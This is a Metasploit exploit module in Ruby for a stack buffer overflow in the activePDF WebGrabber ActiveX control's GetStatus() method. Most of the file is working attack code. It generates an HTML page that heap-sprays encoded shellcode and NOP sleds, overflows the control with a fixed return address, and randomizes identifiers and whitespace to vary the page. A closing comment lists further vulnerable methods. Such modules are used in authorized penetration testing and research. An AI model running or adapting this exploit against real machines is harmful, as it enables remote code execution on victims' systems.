##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Low rank: the only target relies on a fixed 'Ret' address (see 'Targets'
  # below), so success depends on the memory layout of the victim process.
  Rank = LowRanking

  # FILEFORMAT mixin: the module writes the crafted HTML to a local file via
  # file_create rather than serving it over the network; no payload handler is
  # started (see 'DisablePayloadHandler' in DefaultOptions).
  include Msf::Exploit::FILEFORMAT

  # Declares module metadata (name, references, payload constraints, the single
  # target) and registers the FILENAME option.
  #
  # @param info [Hash] extra metadata merged in by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'activePDF WebGrabber ActiveX Control Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in activePDF WebGrabber 3.8. When
          sending an overly long string to the GetStatus() method of APWebGrb.ocx (3.8.2.0)
          an attacker may be able to execute arbitrary code. This control is not marked safe
          for scripting, so choose your attack vector accordingly.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'MC' ],
        'References' => [
          # NOTE(review): a five-digit sequence number is unusual for a 2008 CVE;
          # confirm this identifier against the original advisory.
          [ 'CVE', '2008-20001' ],
          [ 'OSVDB', '64579'],
          [ 'URL', 'http://www.activepdf.com/products/serverproducts/webgrabber/' ],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
          # The generated file is delivered out of band, so the framework does
          # not start a handler automatically when this module runs.
          'DisablePayloadHandler' => true
        },
        'Payload' => {
          # The encoded payload must not contain NUL bytes.
          'Space' => 1024,
          'BadChars' => "\x00",
        },
        'Platform' => 'win',
        'Targets' => [
          # 'Ret' is a fixed address; #exploit packs it into the string passed
          # to GetStatus().
          [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]
        ],
        'DisclosureDate' => '2008-08-26',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        # Name of the HTML file written by file_create.
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']),
      ]
    )
  end

  # Builds the HTML/JavaScript page and writes it to FILENAME.
  #
  # The page instantiates the APWebGrabber.Object control and calls GetStatus()
  # with an oversized string (see the module description).
  def exploit
    # Encode the payload as a JavaScript unescape()-compatible string, using the
    # byte order of the target architecture.
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

    # Four NOP bytes, encoded the same way; the JavaScript below repeats them.
    nops = Rex::Text.to_unescape(make_nops(4))

    # Target return address as a 32-bit value. Note that pack('L') uses the
    # native byte order of the host running this module, not the target's.
    ret = Rex::Text.uri_encode([target.ret].pack('L'))

    # Randomize the JavaScript identifiers (1-100 alphabetic characters; the
    # loop counter 2-31) so the generated page has no fixed variable names.
    vname = rand_text_alpha(rand(100) + 1)
    var_i = rand_text_alpha(rand(30) + 2)
    rand1 = rand_text_alpha(rand(100) + 1)
    rand2 = rand_text_alpha(rand(100) + 1)
    rand3 = rand_text_alpha(rand(100) + 1)
    rand4 = rand_text_alpha(rand(100) + 1)
    rand5 = rand_text_alpha(rand(100) + 1)
    rand6 = rand_text_alpha(rand(100) + 1)
    rand7 = rand_text_alpha(rand(100) + 1)
    rand8 = rand_text_alpha(rand(100) + 1)

    # Roles of the randomized names in the page:
    #   vname - the ActiveX control instance
    #   rand1 - decoded payload, rand2 - decoded NOPs
    #   rand3/rand4 - 20-char pad and pad + payload length
    #   rand5/rand6 - NOP strings, rand6 grown until rand6.length + rand4
    #                 reaches 0x40000
    #   rand7 - 400 copies of rand6 + rand1
    #   rand8 - 800 repetitions of ret, passed to GetStatus()
    # Any script error redirects to about:blank.
    content = %Q|<html>
<head>
<script>
try {
var #{vname} = new ActiveXObject('APWebGrabber.Object');
var #{rand1} = unescape('#{shellcode}');
var #{rand2} = unescape('#{nops}');
var #{rand3} = 20;
var #{rand4} = #{rand3} + #{rand1}.length;
while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
var #{rand5} = #{rand2}.substring(0,#{rand4});
var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
var #{rand7} = new Array();
for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
var #{rand8} = "";
for (#{var_i} = 0; #{var_i} < 800; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
#{vname}.GetStatus(#{rand8},1);
} catch( e ) { window.location = 'about:blank' ; }
</script>
</head>
</html>
|

    # Vary the whitespace of the generated page so its layout is not fixed.
    content = Rex::Text.randomize_space(content)

    print_status("Creating '#{datastore['FILENAME']}' file ...")

    # Write the page to the path configured via FILENAME.
    file_create(content)
  end
end
=begin

Other methods of the control that are also vulnerable:

[id(0x00000050), helpstring("Clean up after a WWWPrint call.")]
void CleanUp(BSTR ServerIPAddress, long ServerPort);

[id(0x00000055)]
BSTR Wait(BSTR IPAddress, long PortNumber, short WaitTime, BSTR AcceptedCommands);

...and probably more.
=end